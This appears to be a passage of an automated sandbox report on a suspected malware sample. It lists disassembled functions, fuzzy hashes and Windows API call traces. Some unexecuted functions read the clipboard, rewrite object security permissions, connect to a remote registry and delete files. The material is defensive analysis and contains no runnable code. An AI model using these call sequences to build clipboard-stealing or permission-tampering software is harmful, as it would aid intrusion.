Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 2c79761423f540672bda14eb4514d80e2afe8b87cb0e6c2e844ebd02b31338ab
Instruction ID: 32c149c2c7e882461bab35b046510287a7a122b37378a28663d97dad0e33bcbf
Opcode Fuzzy Hash: 2c79761423f540672bda14eb4514d80e2afe8b87cb0e6c2e844ebd02b31338ab
Instruction Fuzzy Hash: 59114FB5604601DFC724CF28D581996B7E9FF49350720883EE88ACB661E732E881CB54

Function 0006E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 0006E3CE

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 183afe21c0e71b84afcc3e6a3e92c0009a246a76e1e0909f1455f5e5063dfb8f
Instruction ID: 5b106a5db119f111591e69be8e2de0486f3cb155e5bf21e634614a783c30af23
Opcode Fuzzy Hash: 183afe21c0e71b84afcc3e6a3e92c0009a246a76e1e0909f1455f5e5063dfb8f
Instruction Fuzzy Hash: 002102B4508341DFDB65DF54C444B5BBBE5BF84304F058968F88A57362C732E849CB92

Function 00036D79 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 0006F3E2

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window
String ID:
API String ID: 2353593579-0
Opcode ID: 40bed227c2ccd0498dcee28998da5f67dd050d82b8711b1663ff08f242c69deb
Instruction ID: e1d21472ea9cbbb47a73e1772d9d13f33f0ef3ab96bf3ac071431e988e46369f
Opcode Fuzzy Hash: 40bed227c2ccd0498dcee28998da5f67dd050d82b8711b1663ff08f242c69deb
Instruction Fuzzy Hash: EE118E71700516BEDB4AAB71C880AFEB7ACFF45344F004126F829D2112DB20AE25C7E0

Function 00041A36 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00041A77

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction ID: 50752e130e86861d8bb616476dd9fc14a0062175f32a0d772f427388bf94a45c
Opcode Fuzzy Hash: 8565a2e206dddf4350968ef93c696b5c539dc39c822a590dc04b60a48f516eb7
Instruction Fuzzy Hash: E401D6B22117016ED3245B38D802BABBB98DF447A0F10893AF91ACA1D2EA71E4948794

Function 0008FEF8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0008FF33

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
Instruction ID: 8601de3e7660e9863181b985899d074b82f186f97ab91176be11603fe8e30ca8
Opcode Fuzzy Hash: 0395b2a835dbff9dd1549838c9731aea477c68174e31b915e9f67382827cc5ea
Instruction Fuzzy Hash: 5D01D6322002156BCB14DF2DC8919BFB7A9EF86354714843EF90ACB246E631E801C790

Function 000A495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 000A4998

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 3a052f5b4b29722facd64a7ee3877c6bb50034b6c4c0ed2fd8739867a9eff0de
Instruction ID: 5dcbd8d1cc6f211ead6a9d24d6449de607dc54db80712274b96a6d91afffca78
Opcode Fuzzy Hash: 3a052f5b4b29722facd64a7ee3877c6bb50034b6c4c0ed2fd8739867a9eff0de
Instruction Fuzzy Hash: D1F03135608204AFDB14EF65D846DDF77BCEF45720B004455F8089B2A2DE70BD45CB51

Function 00097C7F Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031

_memset.LIBCMT ref: 00097CB4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Exception@8Throw_memsetstd::exception::exception
String ID:
API String ID: 525207782-0
Opcode ID: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction ID: 53c8b9a60399cf549a029a4095c6b88c010e3a62f04f0f7f3ba4bbfd98000004
Opcode Fuzzy Hash: 3ecc4d077f8347220a40a240f02962e6a21ded5fff4d928bb21853c154afc254
Instruction Fuzzy Hash: C501F6752042009FD361EF5CD941F4ABBE5AF59310F24846AF9888B3A2DB72E800DB90

Function 0006DC5A Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00050FE6: std::exception::exception.LIBCMT ref: 0005101C
Part of subcall function 00050FE6: __CxxThrowException@8.LIBCMT ref: 00051031

_memmove.LIBCMT ref: 0006DC8B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Exception@8Throw_memmovestd::exception::exception
String ID:
API String ID: 1602317333-0
Opcode ID: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction ID: 98cafcae8939157b40112e8fe0c5c6ade36034a847b9b7d857f8ccf106c3cef6
Opcode Fuzzy Hash: 45a849d2a6824c2a98c98ed0063ef32583db97a8290c264e89d73d06c63a9186
Instruction Fuzzy Hash: 2FF0F974604101DFD761DF68C981E5ABBE5BF1A300F2484ACE5898F3A2E772E815CF91

Function 00044A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

_fseek.LIBCMT ref: 00044AA4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: _fseek
String ID:
API String ID: 2937370855-0
Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction ID: 6ede6df026839d40077518be2d7fdd10a4766b4161d992a584d1ce512dcab3ca
Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
Instruction Fuzzy Hash: D7F085B6800208BFDF109F84DC00DEFBBB9EB89320F044198F9045A211D232EA25CBA1

Function 00044A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,000427AF,?,00000001), ref: 00044A63

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 45efe9c1fa5436591180920e27f724aa13eba7dcb7f88fec23d7b177a29be5c2
Instruction ID: 0bdbba8246e558974a4ceca23431b9d95c1bab7ebc418cc8928c558050fcad2f
Opcode Fuzzy Hash: 45efe9c1fa5436591180920e27f724aa13eba7dcb7f88fec23d7b177a29be5c2
Instruction Fuzzy Hash: F4F039B1145701CFCB749F64E8A091ABBF0BF14326324893EE5D783611C771A994DF49

Function 00044AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00044AD0

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction ID: 9f5f1c9f7452ce4170da410b973b2985ca864cd13e88c7807593cc7512f1271e
Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
Instruction Fuzzy Hash: 2FF058B240020DFFDF04CF80C941EAABB79FB04314F208189FC188A212D332EA21AB91

Function 000509C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 000509E4

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: f0432406ba4c779e260e5394cb1bbe80e9e842981837e7d440ff7371d51ae3a1
Instruction ID: 9fa53b6fc5e0d61386715acbdd3457fb0494fb9973de750068369ef67b0987fa
Opcode Fuzzy Hash: f0432406ba4c779e260e5394cb1bbe80e9e842981837e7d440ff7371d51ae3a1
Instruction Fuzzy Hash: 3DE0863290012857C72196989C05FEA77DDDBC9690F0401B6FC08D7245DA659D818691

Function 00094FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 39018efbf8943aad0cb1822f9a67ecdb3ef55eb587cae48967da8851f041162c
Instruction ID: 4e8e209659690aa830f3f845f8fdb19d365dd5349bd480d2e6b0b3f19e14232f
Opcode Fuzzy Hash: 39018efbf8943aad0cb1822f9a67ecdb3ef55eb587cae48967da8851f041162c
Instruction Fuzzy Hash: 30B0923400060296ADA81F3C196889933815A423A97D81BD1E878854E1D239884FF520

Function 0005547B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00055486

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 59e91f2554274461db4a06e0da98eed31d83cde9f1361c5ee5c9cb15492be4df
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 2DB0927644020C77CE012A82EC03AAA3B299B4066AF408020FF0C1C162A673A6A49A89

Function 00053588 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 00053592

Part of subcall function 00053459: __lock.LIBCMT ref: 00053467
Part of subcall function 00053459: DecodePointer.KERNEL32(000ECB70,0000001C,000533B2,00051003,00000001,00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534A6
Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534B7
Part of subcall function 00053459: EncodePointer.KERNEL32(00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534D0
Part of subcall function 00053459: DecodePointer.KERNEL32(-00000004,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534E0
Part of subcall function 00053459: EncodePointer.KERNEL32(00000000,?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534E6
Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 000534FC
Part of subcall function 00053459: DecodePointer.KERNEL32(?,00053300,000000FF,?,00059E5E,00000011,00051003,?,00059CAC,0000000D), ref: 00053507

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Pointer$Decode$Encode$__lock_doexit
String ID:
API String ID: 2158581194-0
Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction ID: 556caec40fc6e490fe3299cb4160b4c27b7d77996ab5c6f1b3d1472ea43f034f
Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
Instruction Fuzzy Hash: 50B0123198030C33DA112541EC03F5A3B0C4740B90F100020FE0C1C1E2A5E3766448C9

Function 0009C270 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00094005: FindFirstFileW.KERNELBASE(?,?), ref: 0009407C
Part of subcall function 00094005: DeleteFileW.KERNEL32(?,?,?,?), ref: 000940CC
Part of subcall function 00094005: FindNextFileW.KERNEL32(00000000,00000010), ref: 000940DD
Part of subcall function 00094005: FindClose.KERNEL32(00000000), ref: 000940F4

GetLastError.KERNEL32 ref: 0009C292

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: FileFind$CloseDeleteErrorFirstLastNext
String ID:
API String ID: 2191629493-0
Opcode ID: 03f99a5a30f29886585a52f10aafd7a89c47faf6c4b091b196b4f9ce05528981
Instruction ID: eb7df8b923ea5e5601a133e14c811128df8ae5a977814e023df2d53c19902bd4
Opcode Fuzzy Hash: 03f99a5a30f29886585a52f10aafd7a89c47faf6c4b091b196b4f9ce05528981
Instruction Fuzzy Hash: C0F0A0326102108FDB15EF59D840FAAB7E9AF88320F058019F9098B352CB74BC02CB94

Non-executed Functions

Function 000A4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(000C0980), ref: 000A465C
IsClipboardFormatAvailable.USER32(0000000D), ref: 000A466A
GetClipboardData.USER32(0000000D), ref: 000A4672
CloseClipboard.USER32 ref: 000A467E
GlobalLock.KERNEL32(00000000), ref: 000A469A
CloseClipboard.USER32 ref: 000A46A4
GlobalUnlock.KERNEL32(00000000,00000000), ref: 000A46B9
IsClipboardFormatAvailable.USER32(00000001), ref: 000A46C6
GetClipboardData.USER32(00000001), ref: 000A46CE
GlobalLock.KERNEL32(00000000), ref: 000A46DB
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 000A470F
CloseClipboard.USER32 ref: 000A481F

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: aa4c08b87b01a95146c04c469ca3cc697aad29eae329a24b2a865133b58af373
Instruction ID: 067fc609ecd29b80005d5bf8a58281ff07ebe496cdbd6e3b3164375852945fb1
Opcode Fuzzy Hash: aa4c08b87b01a95146c04c469ca3cc697aad29eae329a24b2a865133b58af373
Instruction Fuzzy Hash: 9851B075204201ABE300EFA4EC89FAE77A8AFC5B41F004529F656D61E2DFB4D805CB66

Function 000888CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00088E3C
Part of subcall function 00088E20: GetLastError.KERNEL32(?,00088900,?,?,?), ref: 00088E46
Part of subcall function 00088E20: GetProcessHeap.KERNEL32(00000008,?,?,00088900,?,?,?), ref: 00088E55
Part of subcall function 00088E20: HeapAlloc.KERNEL32(00000000,?,00088900,?,?,?), ref: 00088E5C
Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00088E73

Part of subcall function 00088EBD: GetProcessHeap.KERNEL32(00000008,00088916,00000000,00000000,?,00088916,?), ref: 00088EC9
Part of subcall function 00088EBD: HeapAlloc.KERNEL32(00000000,?,00088916,?), ref: 00088ED0
Part of subcall function 00088EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00088916,?), ref: 00088EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00088931
_memset.LIBCMT ref: 00088946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00088965
GetLengthSid.ADVAPI32(?), ref: 00088976
GetAce.ADVAPI32(?,00000000,?), ref: 000889B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000889CF
GetLengthSid.ADVAPI32(?), ref: 000889EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000889FB
HeapAlloc.KERNEL32(00000000), ref: 00088A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00088A23
CopySid.ADVAPI32(00000000), ref: 00088A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00088A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00088A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00088A95

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9fd5929e60ba24caa7f36bd1bfd8a6adadb3356f10e7775064d067c99c1c0184
Instruction ID: 63edf63934f016a4746b4f647210e3f6d4deef9e765a18aeb9242eea9c3864bf
Opcode Fuzzy Hash: 9fd5929e60ba24caa7f36bd1bfd8a6adadb3356f10e7775064d067c99c1c0184
Instruction Fuzzy Hash: CC615871900219FFEF04EFA5DC45EEEBBB9FF04300F54812AE955A6291DB359A04CB60

Function 000B0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B0B0C

Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC

